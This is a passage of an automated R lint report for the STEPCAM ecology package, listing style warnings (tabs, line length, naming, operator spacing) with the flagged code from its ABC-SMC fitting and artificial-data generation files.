^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:20:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L191) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:194:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L194) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L199) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L200) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L201) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L202) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L206) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:14:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:9:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:27:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:14:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:18:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:24:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:40:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L225) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:227:24:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:40:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L227) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L232) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:232:14:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:34:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:238:21:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L238) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:238:22:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L238) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:240:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:240:38:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:258:54:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:261:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L261) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:9:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:32:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:265:27:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L265) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:265:27:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:20:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L266) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:267:20:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L267) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:268:20:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:63:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:282:15:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L282) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:283:44:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L283) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- 